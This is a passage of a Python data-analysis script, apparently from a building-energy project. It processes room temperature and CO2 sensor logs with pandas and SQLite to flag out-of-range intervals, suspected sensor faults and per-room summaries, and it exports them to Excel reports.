csv\n\ntemp_min = 65\ntemp_units = \"deg F\"\nco2_units = \"ppm\"\nco2_max = 1200\ntemp_max = 75\n\nSERVER_PATH = '' # '/media/ea/Data/Students/jade/buildingEnergyApi/'\nPATH = 'my_file'\n\nengine = sqlalchemy.create_engine('sqlite:///' + SERVER_PATH + PATH)\nconn = sqlite3.connect(SERVER_PATH + PATH)\n\nstart_time = time.time()\n\n# TASK TWO BEGINS HERE: analysis of problem rooms at each interval\n\ndf = pd.read_sql(\"TempAndCO2LogFiltered\", engine)\n# Outside Air is gone by this point...\n#print(df.set_index(\"Room #\").loc[\"Outside Air AHU2 ZN-T\"])\n\n# version with input -- could evolve into an interactive front end. Automation will come\n# This is now deprecated: the week start is chosen at task_zero.\n# week_start_month = input(\"Month: (number 1-12)\")\n# week_start_day = input(\"Day: (number 1-31)\")\n# week_start_year = input(\"Year: \")\n\n# week_start = datetime.strptime(week_start_month + \" \" + week_start_day + \" \" + week_start_year + \" 10:30:02\", \"%m %d %Y %H:%M:%S\")\n# #print(week_start)\n\n# #print(df)\ndf_test_copy = df.set_index(\"Timestamp\")\ndf_test_copy[\"Timestamp\"] = pd.to_datetime(df_test_copy.index)\n# for i in range(0, len(df_test_copy.index)):\n# df_test_copy[\"New Column\"][i] = datetime.strptime(df_test_copy.index[i], \"%a %b %d %H:%M:%S %Y\")\n# #print(\"Still working...\")\ndf_test_copy = df_test_copy.set_index([\"Timestamp\", \"Room #\"])\n# #print(week_start)\n# #print(datetime(2020, 2, 14, 7, 0, 3))\n# #print(df_test_copy.index)\n# #print(df_test_copy)\n# #print(df_test_copy.loc[str(week_start)])\n# the above line works if you add in the desired room # or not - use .loc to get a row\n\n#mi_test = pd.DataFrame(np.array([[3, 2, 1], [4, 5, 5], [7, 48, 9]]), columns=[1, 3, 5])\n##print(mi_test)\n##print(mi_test.loc[0])\n#mi_test = mi_test.set_index([1, 3])\n##print(mi_test)\n\n# #print(mi_test[mi_test.index[0]])\n# #print(mi_test.loc[(1732, 222)])# produces a key error\n\n\n# Gets interval data about a certain datetime, and the optional room parameter is passed in\n# Not needed yet...\ndef get_interval_data(date_time, room=None):\n if room is None:\n print(df_test_copy.loc[str(date_time)]) # this works\n else:\n print(df_test_copy.loc[(str(date_time), str(room))]) # this also works -- the room data type is a STRING\n\n\n# get_interval_data(datetime(2020, 2, 14, 7, 0, 3)) # test function call 3/11 -- works perfectly!\n\n# Function defs from task II\ndef check_temp(x):\n ##print(\"Start of x:\")\n ##print(x)\n if x['Temperature'] > temp_max:\n return True\n return False\n\n\ndef check_carbon(x):\n if x['CO2'] > co2_max:\n return True\n return False\n# End of function defs from Task II\n\n\nnew_data = df_test_copy.copy().reset_index()\nnew_data_copy = new_data.copy()\n\nnew_data_copy[\"Weekday\"] = new_data_copy[\"Timestamp\"].apply(lambda x: x.weekday())\nnew_data_copy.to_csv(\"basic_weekly.csv\")\n#co2_min = 350\n#fixed this placeholder value\n\n# These drops AREN'T necessary! We are replacing the tables at the start of the loop anyways\n# conn.cursor().execute(\"DROP TABLE TemperatureProblemsDatabase\")\n# conn.cursor().execute(\"DROP TABLE CarbonDioxideProblemsDatabase\")\n\nfiltered_log = pd.read_sql(\"TempAndCO2LogFiltered\", engine)\nfiltered_log.to_csv(\"weekly.csv\")\n\n# temporarily (0,1) --> should be (0, 5) or (0, # of days)\nfor i in range(0, 5):\n\n new_data = new_data_copy[new_data_copy[\"Weekday\"] == i]\n\n # Beginning of Section Modified from Task II\n\n # #print(\"\\nToo Cold: \\n\")\n temp_data = new_data[(new_data['Temperature'] < temp_min) | (new_data['Temperature'] > temp_max)]\n temp_data = temp_data[['Timestamp', 'Room #', 'Temperature', 'CO2']].sort_values(by=\"Temperature\", ascending=True)\n temp_data['High Temp?'] = temp_data.T.apply(check_temp)\n ##print(\"Temp Data\")\n ##print(i)\n ##print(temp_data)\n # temp_data.to_csv(\"tester.csv\")\n # random_testing_copy = temp_data.copy().reset_index()\n # for i in range(temp_data.size):\n # #print(random_testing_copy.loc[i])\n temp_data.to_sql(\"TemperatureProblemsDatabase\", conn, if_exists='replace') # should replace, because task three will run on one day of data at a time.\n\n # #print(\"\\nToo Much CO2: \\n\")\n print(new_data[[\"CO2\", \"Room #\"]])\n tmp = new_data[[\"CO2\", \"Room #\"]].set_index(\"Room #\")\n #print(tmp.loc[\"Outside Air AHU2 ZN-T\"])\n new_data[\"Min_CO2\"] = None\n\n def find_min_co2(row):\n tmstmp = row[\"Timestamp\"]\n df1 = new_data.where(new_data[\"Room #\"] == \"Outside Air\").dropna(how='all')\n df1 = df1.where(df1[\"Timestamp\"] == tmstmp).dropna(how='all')\n # print(df1)\n return df1[\"CO2\"].iloc[0]\n\n new_data[\"Min_CO2\"] = new_data.apply(find_min_co2, axis=1)\n print(new_data[\"Min_CO2\"])\n carbon_data = new_data[(new_data.CO2 > co2_max) | (new_data.CO2 < new_data.Min_CO2)][['Timestamp', 'Room #', 'Temperature', 'CO2']].sort_values(by='CO2')\n carbon_data['High Carbon?'] = carbon_data.T.apply(check_carbon)\n carbon_data.to_sql(\"CarbonDioxideProblemsDatabase\", conn, if_exists='replace') # should replace, because task three will run on one day of data at a time.\n # carbon_data.to_csv(\"weekly.csv\")\n\n # End of Section Modified from Task II\n\n # TODO: make a task 3 aggregation here.\n\n temp_data = pd.read_sql_table(\"TemperatureProblemsDatabase\", engine) # might need this into the other sql table directly... probably easiest\n temp_data = temp_data.sort_values(\"Room #\")\n temp_data.to_csv(SERVER_PATH + 'tester.csv')\n co2_data = pd.read_sql_table(\"CarbonDioxideProblemsDatabase\", engine)\n\n weekly_log = new_data.copy().reset_index().drop(\"level_0\", axis=1)\n\n # Convert times to integers so that they compare accurately\n\n for x in range(0, len(temp_data['Timestamp'])):\n temp_data['Timestamp'].loc[x] = (pd.to_datetime(temp_data['Timestamp'].loc[x]) - dt.timedelta(0))\n for x in range(0, len(co2_data['Timestamp'])):\n co2_data['Timestamp'].loc[x] = (pd.to_datetime(co2_data['Timestamp'].loc[x]) - dt.timedelta(0))\n for x in range(0, len(weekly_log['Timestamp'])):\n #print(weekly_log[\"Timestamp\"])\n weekly_log['Timestamp'].loc[x] = (pd.to_datetime(weekly_log['Timestamp'].loc[x]) - dt.timedelta(0))\n\n time_temp = temp_data.copy().set_index([\"Room #\", \"Temperature\"])\n time_co2 = co2_data.copy().set_index([\"Room #\", \"CO2\"])\n time_wkly_temp = weekly_log.copy().set_index([\"Room #\", \"Temperature\"])\n time_wkly_co2 = weekly_log.copy().set_index([\"Room #\", \"CO2\"])\n\n # Multi-index should identify a room and temp or co2 value uniquely for when we look for the times of h/l values\n\n td_copy = temp_data.set_index(\"Room #\").T\n cd_copy = co2_data.set_index(\"Room #\").T\n\n weekly_log['Highest Temperature'] = weekly_log['Temperature']\n weekly_log['Lowest Temperature'] = weekly_log['Temperature']\n weekly_log['Highest CO2'] = weekly_log['CO2']\n weekly_log['Lowest CO2'] = weekly_log['CO2']\n\n # Groups low/high #s\n\n weekly_log = weekly_log.groupby(\"Room #\").agg({'Lowest Temperature': np.min,\n 'Highest Temperature': np.max,\n 'Highest CO2': np.max,\n 'Lowest CO2': np.min})\n\n # weekly_log.to_csv(\"tester.csv\")\n\n all_data = pd.merge(temp_data, co2_data, how='outer', on=['Room #', \"Timestamp\", \"Temperature\", \"CO2\"]).drop(\"index_x\", axis=1).drop(\"index_y\", axis=1)\n # all_data.to_csv(\"tester.csv\")\n\n # Finds number of intervals with a given problem for each room\n\n weekly_log['Intervals Too Cold'] = None\n weekly_log['Intervals Too Warm'] = None\n weekly_log['Intervals Too Much CO2'] = None\n weekly_log['Intervals Too Little CO2'] = None\n\n for room in td_copy:\n #print(\"ROOM: \")\n #print(room)\n intervals_temp = td_copy[room].T\n intervals_temp['Intervals'] = None\n if type(intervals_temp) == pd.Series:\n intervals_temp = pd.DataFrame(intervals_temp).T\n intervals_temp = intervals_temp.groupby(\"High Temp?\").agg({\"Intervals\": np.size})\n #print(\"Temp Intervals: \")\n #print(intervals_temp)\n if len(intervals_temp) == 1:\n if intervals_temp.index[0] == 0:\n weekly_log['Intervals Too Cold'][room] = (intervals_temp.iloc[0])[0]\n else:\n weekly_log['Intervals Too Warm'][room] = (intervals_temp.iloc[0])[0]\n elif len(intervals_temp) == 2:\n weekly_log['Intervals Too Cold'][room] = (intervals_temp.iloc[0])[0]\n weekly_log['Intervals Too Warm'][room] = (intervals_temp.iloc[1])[0]\n\n for room in cd_copy:\n #print(\"ROOM: \")\n #print(room)\n intervals_co2 = cd_copy[room].T\n intervals_co2['Intervals'] = None\n if type(intervals_co2) == pd.Series:\n intervals_co2 = pd.DataFrame(intervals_co2).T\n intervals_co2 = intervals_co2.groupby(\"High Carbon?\").agg({\"Intervals\": np.size})\n #print(\"CO2 Intervals: \")\n #print(intervals_co2)\n if len(intervals_co2) == 1:\n if intervals_co2.index[0] == 0:\n weekly_log['Intervals Too Little CO2'][room] = (intervals_co2.iloc[0])[0]\n else:\n weekly_log['Intervals Too Much CO2'][room] = (intervals_co2.iloc[0])[0]\n elif len(intervals_co2) == 2:\n weekly_log['Intervals Too Little CO2'][room] = (intervals_co2.iloc[0])[0]\n weekly_log['Intervals Too Much CO2'][room] = (intervals_co2.iloc[1])[0]\n\n # go back into time database (copied from original database) and locate timestamps\n\n weekly_log['First Time Too Cold'] = None\n weekly_log['First Time Too Warm'] = None\n weekly_log['Last Time Too Cold'] = None\n weekly_log['Last Time Too Warm'] = None\n\n for room in time_temp.index:\n room_number = room[0]\n temp_df = time_temp.loc[room_number]\n temp_df['First Time'] = temp_df['Timestamp']\n temp_df['Last Time'] = temp_df['Timestamp']\n temp_df = temp_df.groupby(\"High Temp?\").agg({\"First Time\": np.min, \"Last Time\": np.max})\n early_times = temp_df['First Time']\n if len(early_times) == 1:\n if early_times.index[0] == 0:\n weekly_log['First Time Too Cold'][room_number] = early_times.iloc[0]\n else:\n weekly_log['First Time Too Warm'][room_number] = early_times.iloc[0]\n elif len(early_times) == 2:\n #print(early_times)\n weekly_log['First Time Too Cold'][room_number] = early_times.iloc[0]\n weekly_log['First Time Too Warm'][room_number] = early_times.iloc[1]\n # make sure data is sorted before this happens!!! I think it is sorted because of the groupby\n late_times = temp_df['Last Time']\n if len(late_times) == 1:\n if late_times.index[0] == 0:\n weekly_log['Last Time Too Cold'][room_number] = late_times.iloc[0]\n else:\n weekly_log['Last Time Too Warm'][room_number] = late_times.iloc[0]\n elif len(late_times) == 2:\n #print(late_times)\n weekly_log['Last Time Too Cold'][room_number] = late_times[0]\n weekly_log['Last Time Too Warm'][room_number] = late_times[1]\n # make sure data is sorted before this happens!!! I think it is sorted because of the groupby\n\n weekly_log['Time of Lowest Temperature'] = None\n weekly_log['Time of Highest Temperature'] = None\n weekly_log['Time of Highest CO2'] = None\n weekly_log['Time of Lowest CO2'] = None\n temp_data['Time of Lowest Temperature'] = None\n temp_data['Time of Highest Temperature'] = None\n co2_data['Time of Lowest CO2'] = None\n co2_data['Time of Highest CO2'] = None\n\n\n def convert_datetime(z):\n if type(z) == str:\n return z\n elif type(z) == pd.Timestamp:\n #print(type(datetime.strftime(z.to_pydatetime(), '%Y-%m-%d %H:%M:%S')))\n return datetime.strftime(z.to_pydatetime(), '%Y-%m-%d %H:%M:%S')\n\n\n # finds times of high/low temps on a daily basis... this isn't actually used in the final report but it might be good information to have\n\n for room in time_wkly_temp.index:\n low_temps = time_wkly_temp.loc[room[0]].loc[weekly_log['Lowest Temperature'][room[0]]]['Timestamp']\n high_temps = time_wkly_temp.loc[room[0]].loc[weekly_log['Highest Temperature'][room[0]]]['Timestamp']\n if type(low_temps) == pd.Series:\n weekly_log['Time of Lowest Temperature'][room[0]] = convert_datetime(low_temps.iloc[0])\n else:\n weekly_log['Time of Lowest Temperature'][room[0]] = convert_datetime(low_temps)\n if type(high_temps) == pd.Series:\n weekly_log['Time of Highest Temperature'][room[0]] = convert_datetime(high_temps.iloc[0])\n else:\n weekly_log['Time of Highest Temperature'][room[0]] = convert_datetime(high_temps)\n temp_data['Time of Lowest Temperature'][room[0]] = weekly_log['Time of Lowest Temperature'][room[0]]\n temp_data['Time of Highest Temperature'][room[0]] = weekly_log['Time of Highest Temperature'][room[0]]\n\n for room in time_wkly_co2.index:\n low_co2 = time_wkly_co2.loc[room[0]].loc[weekly_log['Lowest CO2'][room[0]]]['Timestamp']\n high_co2 = time_wkly_co2.loc[room[0]].loc[weekly_log['Highest CO2'][room[0]]]['Timestamp']\n if type(low_co2) == pd.Series:\n weekly_log['Time of Lowest CO2'][room[0]] = convert_datetime(low_co2.iloc[0])\n else:\n weekly_log['Time of Lowest CO2'][room[0]] = convert_datetime(low_co2)\n if type(high_co2) == pd.Series:\n weekly_log['Time of Highest CO2'][room[0]] = convert_datetime(high_co2.iloc[0])\n else:\n weekly_log['Time of Highest CO2'][room[0]] = convert_datetime(high_co2)\n co2_data['Time of Lowest CO2'][room[0]] = weekly_log['Time of Lowest CO2'][room[0]]\n co2_data['Time of Highest CO2'][room[0]] = weekly_log['Time of Highest CO2'][room[0]]\n\n #weekly_log = pd.merge(all_data, weekly_log, how='outer', on=['Room #'])\n\n # Converts to string so SQL can handle it\n for x in range(0, len(weekly_log['First Time Too Cold'])):\n weekly_log['First Time Too Cold'].iloc[x] = convert_datetime(weekly_log['First Time Too Cold'].iloc[x])\n weekly_log['Last Time Too Cold'].iloc[x] = convert_datetime(weekly_log['Last Time Too Cold'].iloc[x])\n weekly_log['First Time Too Warm'].iloc[x] = convert_datetime(weekly_log['First Time Too Warm'].iloc[x])\n weekly_log['Last Time Too Warm'].iloc[x] = convert_datetime(weekly_log['Last Time Too Warm'].iloc[x])\n\n for x in range(0, len(time_wkly_temp['Timestamp'])):\n time_wkly_temp['Timestamp'].iloc[x] = convert_datetime(time_wkly_temp['Timestamp'].iloc[x])\n\n for x in range(0, len(time_wkly_co2['Timestamp'])):\n time_wkly_co2['Timestamp'].iloc[x] = convert_datetime(time_wkly_co2['Timestamp'].iloc[x])\n\n time_wkly_temp = time_wkly_temp.reset_index()\n time_wkly_co2 = time_wkly_co2.reset_index()\n time_wkly_temp = time_wkly_temp.sort_values('Room #')\n time_wkly_co2 = time_wkly_co2.sort_values('Room #')\n # all_data.to_csv(\"tester.csv\")\n\n #time_wkly_temp.to_csv(\"tester.csv\")\n\n # Connect to databases\n\n conn = sqlite3.connect(SERVER_PATH + PATH)\n all_data.to_sql(\"FilteredT3Database\", conn, if_exists='append')\n time_wkly_temp.to_sql(\"DailyTempDatabase\", conn, if_exists='append')\n #print(time_wkly_temp)\n time_wkly_co2.to_sql(\"DailyCarbonDatabase\", conn, if_exists='append')\n weekly_log.to_sql(\"DailyDatabase\", conn, if_exists='append')\n\n # Drops aren't necessary:\n # TemperatureProblems and CarbonDioxideProblems DBs are \"replaced\" at the start of the loop\n # Daily Log is reset to a copy of \"new_data\" at the start of the loop\n #print(\"Daily Problems\")\n\n# sql_temp_test = pd.read_sql(\"TemperatureProblemsDatabase\", engine)\n# sql_co2_test = pd.read_sql(\"CarbonDioxideProblemsDatabase\", engine)\n# sql_co2_test.to_csv(\"weekly.csv\")\n\n# TODO: run task 4 on aggregation of daily problem reports\n\ndaily_data = pd.read_sql_table(\"DailyDatabase\", engine)\ndaily_data['Days With Problems'] = None\nall_temps = pd.read_sql_table(\"DailyTempDatabase\", engine)\nall_carbon = pd.read_sql_table(\"DailyCarbonDatabase\", engine)\ndays_with_problems = pd.read_sql_table(\"FilteredT3Database\", engine)\ndays_with_problems = days_with_problems.drop(\"index\", axis=1)\ndays_with_problems['Day'] = days_with_problems['Timestamp'].apply(lambda z: datetime.strftime(z, \"%Y-%m-%d\"))#kept as a string for now just to avoid automatic time assignment\ndays_with_problems = days_with_problems.set_index([\"Room #\", \"Day\"])\ndays_with_problems[\"Days With Problems\"] = None\ndays_with_problems = days_with_problems.groupby(level=[0, 1]).agg({\"Days With Problems\": np.size})\ndays_with_problems = days_with_problems.groupby(level=0).agg({\"Days With Problems\": np.size})\ndays_with_problems.to_csv(\"ahs_cold_data.csv\")\n\nall_temps_copy = all_temps.set_index(['Room #', 'Temperature'])\nall_carbon_copy = all_carbon.set_index(['Room #', 'CO2'])\n\n\ndef convert_back(z):\n if z == \"N/A\":\n return np.NaN\n elif z is not None:\n return datetime.strptime(z, \"%Y-%m-%d %H:%M:%S\").timestamp()\n else:\n return None\n\n\nfor x in range(0, len(daily_data['First Time Too Cold'])):\n daily_data['First Time Too Cold'].loc[x] = convert_back(daily_data['First Time Too Cold'].loc[x])\n daily_data['Last Time Too Cold'].loc[x] = convert_back(daily_data['Last Time Too Cold'].loc[x])\n daily_data['First Time Too Warm'].loc[x] = convert_back(daily_data['First Time Too Warm'].loc[x])\n daily_data['Last Time Too Warm'].loc[x] = convert_back(daily_data['Last Time Too Warm'].loc[x])\n\n#print(daily_data['Last Time Too Cold'])\n\n\ndef none_to_nan(x):\n if x is None:\n return np.NaN\n return x\n\n\nall_temps['Temperature'] = all_temps['Temperature'].apply(none_to_nan)\nall_carbon['CO2'] = all_carbon['CO2'].apply(none_to_nan)\n\nall_temps['Median Temperature'] = all_temps['Temperature']\nall_temps['Mean Temperature'] = all_temps['Temperature']\ntemp_analysis = all_temps.groupby(\"Room #\").agg({\"Mean Temperature\": np.nanmean,\n \"Median Temperature\": np.nanmedian})\n\nall_carbon['Median CO2'] = all_carbon['CO2']\nall_carbon['Mean CO2'] = all_carbon['CO2']\nco2_analysis = all_carbon.groupby(\"Room #\").agg({\"Mean CO2\": np.mean,\n \"Median CO2\": np.median})\n\n# for some reason, sql was automatically converting all the interval values to bytes... but this reverses it\n\n\ndef convert_to_int(x):\n if x is not None:\n return int.from_bytes(x, sys.byteorder)\n return None\n\n\ndaily_data['Intervals Too Warm'] = daily_data['Intervals Too Warm'].apply(convert_to_int)\ndaily_data['Intervals Too Cold'] = daily_data['Intervals Too Cold'].apply(convert_to_int)\ndaily_data['Intervals Too Much CO2'] = daily_data['Intervals Too Much CO2'].apply(convert_to_int)\ndaily_data['Intervals Too Little CO2'] = daily_data['Intervals Too Little CO2'].apply(convert_to_int)\n\n#print(daily_data['First Time Too Cold'])\n#print(daily_data['Last Time Too Cold'])\n\n#print(daily_data.where(daily_data[\"Room #\"] == \"Mars\"))\n\n#days_with_problems = days_with_problems.groupby(\"\")\n\ndaily_data = daily_data.groupby(\"Room #\")\n\ndaily_data = daily_data.agg({\"Intervals Too Warm\": np.sum,\n \"Intervals Too Cold\": np.sum,\n \"Intervals Too Much CO2\": np.sum,\n \"Intervals Too Little CO2\": np.sum,\n \"Highest Temperature\": np.max,\n \"Lowest Temperature\": np.min,\n 'Highest CO2': np.max,\n 'Lowest CO2': np.min,\n \"First Time Too Warm\": np.min,\n \"Last Time Too Warm\": np.max,\n \"First Time Too Cold\": np.min,\n \"Last Time Too Cold\": np.max})\ndaily_data = pd.merge(daily_data, days_with_problems, how='outer', on=['Room #'])\n\ndaily_data['Time of Highest Temperature'] = None\ndaily_data['Time of Lowest Temperature'] = None\ndaily_data['Time of Highest CO2'] = None\ndaily_data['Time of Lowest CO2'] = None\n\n# For each room, goes back into the copies to find the times of the most extreme values\nfor room in daily_data.index:\n if not np.isnan(daily_data['Highest Temperature'][room]):\n # match highest temp to time at which it occurred\n index_tuple = (room, daily_data['Highest Temperature'][room]) # removed cast to int...\n if type(all_temps_copy.loc[index_tuple]) == pd.Series:\n temp_df =(pd.DataFrame(all_temps_copy.loc[index_tuple]).T.sort_values('Timestamp')).T\n daily_data['Time of Highest Temperature'][room] = temp_df.loc['Timestamp'][0]\n else:\n daily_data['Time of Highest Temperature'][room] = all_temps_copy.loc[index_tuple].sort_values('Timestamp').reset_index().iloc[0]['Timestamp']\n if not np.isnan(daily_data['Lowest Temperature'][room]):\n # match lowest temp to time at which it occurred\n index_tuple = (room, int(daily_data['Lowest Temperature'][room]))\n if type(all_temps_copy.loc[index_tuple]) == pd.Series:\n temp_df =(pd.DataFrame(all_temps_copy.loc[index_tuple]).T.sort_values('Timestamp')).T\n daily_data['Time of Lowest Temperature'][room] = temp_df.loc['Timestamp'][0]\n else:\n daily_data['Time of Lowest Temperature'][room] = all_temps_copy.loc[index_tuple].sort_values('Timestamp').reset_index().iloc[0]['Timestamp']\n if not np.isnan(daily_data['Highest CO2'][room]):\n # match highest co2 to time at which it occurred\n index_tuple = (room, int(daily_data['Highest CO2'][room]))\n if type(all_carbon_copy.loc[index_tuple]) == pd.Series:\n temp_df =(pd.DataFrame(all_carbon_copy.loc[index_tuple]).T.sort_values('Timestamp')).T\n daily_data['Time of Highest CO2'][room] = temp_df.loc['Timestamp'][0]\n else:\n daily_data['Time of Highest CO2'][room] = all_carbon_copy.loc[index_tuple].sort_values('Timestamp').reset_index().iloc[0]['Timestamp']\n if not np.isnan(daily_data['Lowest CO2'][room]):\n # match lowest co2 to time at which it occurred\n index_tuple = (room, int(daily_data['Lowest CO2'][room]))\n if type(all_carbon_copy.loc[index_tuple]) == pd.Series:\n temp_df =(pd.DataFrame(all_carbon_copy.loc[index_tuple]).T.sort_values('Timestamp')).T\n daily_data['Time of Lowest CO2'][room] = temp_df.loc['Timestamp'][0]\n else:\n daily_data['Time of Lowest CO2'][room] = all_carbon_copy.loc[index_tuple].sort_values('Timestamp').reset_index().iloc[0]['Timestamp']\n\n\ndef make_time_readable(x):\n if (x is not None) and (not np.isnan(x)):\n return datetime.fromtimestamp(x)\n return None\n\n\ndaily_data[\"First Time Too Warm\"] = daily_data[\"First Time Too Warm\"].apply(make_time_readable)\ndaily_data[\"Last Time Too Warm\"] = daily_data[\"Last Time Too Warm\"].apply(make_time_readable)\ndaily_data[\"First Time Too Cold\"] = daily_data[\"First Time Too Cold\"].apply(make_time_readable)\ndaily_data[\"Last Time Too Cold\"] = daily_data[\"Last Time Too Cold\"].apply(make_time_readable)\n\ndaily_data = pd.merge(daily_data, temp_analysis, how='outer', on=['Room #'])\ndaily_data = pd.merge(daily_data, co2_analysis, how='outer', on=['Room #'])\n\ndaily_data.to_excel(\"output.xlsx\")\n# daily_data.to_csv('tester.csv')\n\n# NOTE: The old data that was in the Weekly Log table is saved in a table called OldWeeklyLog, fittingly.\n# Clearing weekly files\n\ncursor = conn.cursor()\ndrop1 = \"DROP TABLE DailyTempDatabase\"\ndrop2 = \"DROP TABLE DailyCarbonDatabase\"\ndrop3 = \"DROP TABLE DailyDatabase\"\ndrop4 = \"DROP TABLE FilteredT3Database\"\ncursor.execute(drop1)\ncursor.execute(drop2)\ncursor.execute(drop3)\ncursor.execute(drop4)\n\n\n# Task 4.5 -- creating the 4 more consolidated sheets\n# UPDATE: in the new branch, this task will also separate rooms with sensor issues into their own spreadsheets\n\noriginal_file = pd.read_excel(\"output.xlsx\")\n#original_file.to_csv(\"tester.csv\")\noriginal_file['Likely Sensor Issue?'] = None\noriginal_file[\"CO2 Sensor Issue?\"] = None\noriginal_file[\"Temperature Sensor Issue?\"] = None\n# Too little CO2 should probably be combined with this...\nfor x in range(0, len(original_file[\"Days With Problems\"])):\n original_file[\"Likely Sensor Issue?\"].iloc[x] = original_file[\"Intervals Too Cold\"].iloc[x] > 160 or original_file['Intervals Too Warm'].iloc[x] > 160 or original_file[\"Intervals Too Much CO2\"].iloc[x] > 160 or original_file[\"Lowest Temperature\"].iloc[x] == original_file[\"Highest Temperature\"].iloc[x] or original_file[\"Lowest CO2\"].iloc[x] == original_file[\"Highest CO2\"].iloc[x] or original_file[\"Intervals Too Little CO2\"].iloc[x] > 0\n original_file[\"CO2 Sensor Issue?\"].iloc[x] = original_file[\"Lowest CO2\"].iloc[x] == original_file[\"Highest CO2\"].iloc[x] or original_file[\"Intervals Too Little CO2\"].iloc[x] > 0\n # original_file[\"Intervals Too Much CO2\"].iloc[x] > 160 or\n original_file[\"Temperature Sensor Issue?\"].iloc[x] = original_file[\"Intervals Too Cold\"].iloc[x] > 160 or original_file['Intervals Too Warm'].iloc[x] > 160 or original_file[\"Lowest Temperature\"].iloc[x] == original_file[\"Highest Temperature\"].iloc[x]\n\n\n# Cold Values\ncold_values = original_file[[\"Room #\", \"Days With Problems\", \"Intervals Too Cold\", \"Lowest Temperature\", \"Highest Temperature\", \"Mean Temperature\", \"Median Temperature\", \"First Time Too Cold\", \"Last Time Too Cold\", \"Time of Highest Temperature\", \"Time of Lowest Temperature\", \"Likely Sensor Issue?\", \"Temperature Sensor Issue?\"]]\ncold_values = cold_values[cold_values['Intervals Too Cold'] > 0]\ncold_values = cold_values[cold_values[\"Temperature Sensor Issue?\"] == False]\ncold_values = cold_values.sort_values(by=\"Intervals Too Cold\", ascending=False)\nfor x in range(0, len(cold_values['Median Temperature'])):\n cold_values['Median Temperature'].iloc[x] = int(cold_values['Median Temperature'].iloc[x])\n cold_values['Mean Temperature'].iloc[x] = int(cold_values['Mean Temperature'].iloc[x])\n for category in ['Time of Highest Temperature', 'Time of Lowest Temperature', \"First Time Too Cold\", \"Last Time Too Cold\"]:\n if type(cold_values[category].iloc[x]) == str:\n temp_time = datetime.strptime(cold_values[category].iloc[x], \"%Y-%m-%d %H:%M:%S\")\n elif type(cold_values[category].iloc[x] == pd.Timestamp):\n temp_time = cold_values[category].iloc[x]\n cold_values[category].iloc[x] = datetime.strftime(temp_time, \"%a %d %b %Y %H:%M\")\n#cold_values.to_csv(\"tester.csv\")\ncold_values.to_excel(\"cold.xlsx\")\n\n# Warm Values\nwarm_values = original_file[[\"Room #\", \"Days With Problems\", \"Intervals Too Warm\", \"Lowest Temperature\", \"Highest Temperature\", \"Mean Temperature\", \"Median Temperature\", \"First Time Too Warm\", \"Last Time Too Warm\", \"Time of Highest Temperature\", \"Time of Lowest Temperature\", \"Likely Sensor Issue?\", \"Temperature Sensor Issue?\"]]\nwarm_values = warm_values[warm_values['Intervals Too Warm'] > 0]\nwarm_values = warm_values[warm_values[\"Temperature Sensor Issue?\"] == False]\nwarm_values = warm_values.sort_values(by=\"Intervals Too Warm\", ascending=False)\nfor x in range(0, len(warm_values['Median Temperature'])):\n warm_values['Median Temperature'].iloc[x] = int(warm_values['Median Temperature'].iloc[x])\n warm_values['Mean Temperature'].iloc[x] = int(warm_values['Mean Temperature'].iloc[x])\n for category in ['Time of Highest Temperature', 'Time of Lowest Temperature', \"First Time Too Warm\", \"Last Time Too Warm\"]:\n if type(warm_values[category].iloc[x]) == str:\n temp_time = datetime.strptime(warm_values[category].iloc[x], \"%Y-%m-%d %H:%M:%S\")\n elif type(warm_values[category].iloc[x] == pd.Timestamp):\n temp_time = warm_values[category].iloc[x]\n warm_values[category].iloc[x] = datetime.strftime(temp_time, \"%a %d %b %Y %H:%M\")\nwarm_values.to_csv(\"weekly.csv\")\nwarm_values.to_excel(\"warm.xlsx\")\n\n# High CO2 Values\nhigh_co2 = original_file[[\"Room #\", \"Days With Problems\", \"Intervals Too Much CO2\", \"Lowest CO2\", \"Highest CO2\", \"Mean CO2\", \"Median CO2\", \"Time of Highest CO2\", \"Time of Lowest CO2\", \"Likely Sensor Issue?\", \"CO2 Sensor Issue?\"]]\nhigh_co2 = high_co2[high_co2['Intervals Too Much CO2'] > 0]\nhigh_co2 = high_co2[high_co2[\"CO2 Sensor Issue?\"] == False]\nhigh_co2 = high_co2.sort_values(by=\"Intervals Too Much CO2\", ascending=False)\nfor x in range(0, len(high_co2['Median CO2'])):\n high_co2['Median CO2'].iloc[x] = int(high_co2['Median CO2'].iloc[x])\n high_co2['Mean CO2'].iloc[x] = int(high_co2['Mean CO2'].iloc[x])\n for category in ['Time of Highest CO2', 'Time of Lowest CO2']:\n if type(high_co2[category].iloc[x]) == str:\n temp_time = datetime.strptime(high_co2[category].iloc[x], \"%Y-%m-%d %H:%M:%S\")\n elif type(high_co2[category].iloc[x] == pd.Timestamp):\n temp_time = high_co2[category].iloc[x]\n high_co2[category].iloc[x] = datetime.strftime(temp_time, \"%a %d %b %Y %H:%M\")\n#high_co2.to_csv(\"basic_weekly.csv\")\nhigh_co2.to_excel(\"high_co2.xlsx\")\n\n# SENSOR ISSUE (incl. low co2)\nlow_co2 = original_file[[\"Room #\", \"Intervals Too Warm\", \"Intervals Too Cold\", \"Intervals Too Much CO2\", \"Intervals Too Little CO2\", \"Lowest CO2\", \"Highest CO2\", \"Lowest Temperature\", \"Highest Temperature\", \"Likely Sensor Issue?\", \"CO2 Sensor Issue?\", \"Temperature Sensor Issue?\"]]\nlow_co2 = low_co2[low_co2[\"Likely Sensor Issue?\"] == True]\nlow_co2 = low_co2.sort_values(by=\"Intervals Too Little CO2\", ascending=False)\n#for x in range(0, len(low_co2['Intervals Too Warm'])):\n # low_co2['Median CO2'].iloc[x] = int(low_co2['Median CO2'].iloc[x])\n # low_co2['Mean CO2'].iloc[x] = int(low_co2['Mean CO2'].iloc[x])\n # low_co2['Median Temperature'].iloc[x] = int(low_co2['Median Temperature'].iloc[x])\n # low_co2['Mean Temperature'].iloc[x] = int(low_co2['Mean Temperature'].iloc[x])\n #for category in ['Time of Highest CO2', 'Time of Lowest CO2', 'Time of Highest Temperature', 'Time of Lowest Temperature', 'First Time Too Cold', 'Last Time Too Cold', 'First Time Too Warm', 'Last Time Too Warm']:\n #if type(low_co2[category].iloc[x]) == str:\n #temp_time = datetime.strptime(low_co2[category].iloc[x], \"%Y-%m-%d %H:%M:%S\")\n #elif type(low_co2[category].iloc[x] == pd.Timestamp):\n #temp_time = low_co2[category].iloc[x]\n #try:\n #low_co2[category].iloc[x] = datetime.strftime(temp_time, \"%a %d %b %Y %H:%M\")\n #except ValueError:\n #low_co2[category].iloc[x] = 